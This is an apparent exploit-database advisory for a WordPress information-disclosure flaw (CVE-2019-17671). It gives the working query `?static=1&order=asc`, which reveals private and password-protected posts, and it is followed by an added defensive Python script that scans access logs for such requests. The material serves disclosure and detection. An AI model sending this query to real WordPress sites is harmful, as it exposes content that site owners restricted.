WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts
Author: Sebastian Neef
type: webapps
platform: multiple
date_added: 2019-11-19
date_updated: 2019-11-19
verified: 0
codes: CVE-2019-17671
So far we know that adding `?static=1` to a WordPress URL should leak its secret content.
Here are a few ways to manipulate the returned entries:
- `order` with `asc` or `desc`
- `orderby`
- `m` with `m=YYYY`, `m=YYYYMM` or `m=YYYYMMDD` date format
In this case, simply reversing the order of the returned elements suffices and `http://wordpress.local/?static=1&order=asc` will show the secret content:
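For defenders checking whether the behaviour described above was exercised against a site, the following added example (not part of the original advisory) scans access-log lines for requests carrying a `static` query variable and reports which of the listed modifiers came with it. It assumes combined log format; the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request part of a combined-log-format line: "METHOD target HTTP/x.y" status
REQUEST_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Parameters the advisory lists for manipulating the returned entries.
MODIFIERS = ("order", "orderby", "m")


def inspect_line(line):
    """Return a finding dict if the request carries a `static` query var, else None."""
    match = REQUEST_RE.search(line)
    if match is None:
        return None
    query = urlsplit(match.group("target")).query
    # parse_qs splits the query string and percent-decodes names and values.
    params = parse_qs(query, keep_blank_values=True)
    # Assumption of this example: flag any non-empty value, not only `1`.
    if not any(value for value in params.get("static", [])):
        return None
    return {
        "client": line.split(" ", 1)[0],
        "status": int(match.group("status")),
        "modifiers": {k: params[k][-1] for k in MODIFIERS if k in params},
    }


def scan(lines):
    """Return the findings for every matching line, in input order."""
    return [f for f in map(inspect_line, lines) if f is not None]


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Nov/2019:10:00:00 +0000] "GET /?p=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [19/Nov/2019:10:00:03 +0000] "GET /?static=1&order=asc HTTP/1.1" 200 9034',
    '192.0.2.44 - - [19/Nov/2019:10:00:05 +0000] "GET /?static=1&orderby=date&m=201911 HTTP/1.1" 200 8710',
    '192.0.2.77 - - [19/Nov/2019:10:00:09 +0000] "GET /wp-content/static/app.js?v=1 HTTP/1.1" 200 311',
    '192.0.2.80 - - [19/Nov/2019:10:00:11 +0000] "GET /?static= HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A path that merely contains the word `static` and an empty `static=` value are both ignored, which keeps asset requests out of the results.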